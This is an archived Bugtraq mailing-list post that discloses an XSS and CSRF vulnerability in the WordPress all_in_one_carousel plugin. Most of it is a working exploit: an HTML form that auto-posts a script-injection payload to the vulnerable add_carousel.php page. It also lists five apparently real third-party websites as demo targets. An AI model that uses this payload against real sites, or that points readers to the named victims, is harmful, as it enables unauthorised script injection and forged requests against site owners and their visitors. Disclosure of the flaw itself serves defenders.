lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201402100725.s1A7PrXG009527@sf01web1.securityfocus.com>
Date: Mon, 10 Feb 2014 07:25:53 GMT
From: iedb.team@...il.com
To: bugtraq@...urityfocus.com
Subject: Wordpress all_in_one_carousel Plugin /XSS/CSRF/ Vuln





#  Exploit :


<center><b>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability

</center><br><br>
<html>
<head>
<title>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability   [IeDb TeaM]</title>
</head><body>
<form
action=\"http://YourTarget.Com\"
id=\"formid\" method=\"post\">

<input name=\"name\" value=\'\"><script>alert(/IeDb.ir/)</script>\' /><br><br>
<input type=\"submit\" value=\"Submit\"/>
</form></body></html>

#
#  XSS Code : \"><script>alert(/IeDb.ir/)</script>
#
#  Vulnerable Page :
#
#       Localhost/[AnyPath]/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
#
#
#   [+] Image : http://sectime.ir/myfiles/Xss-wp.png
#
#
#
# D3m0 :
#
#

http://www.gaffandigital.com/MattDejanovich/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
http://yourworldmotorsports.com/wp-content/plugins/all_in_one_carousel/all_in_one_carousel/tpl/add_carousel.php
http://www.directorphilippemartinez.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
http://arborhillsgreatdanes.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
http://www.revsoft.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php

#
#
# Gr33tz : All Members In IeDb.Ir/acc  |  Thanks : 8ThBit , Dr.3v1l And ....


###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2014-02-04]

###########################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ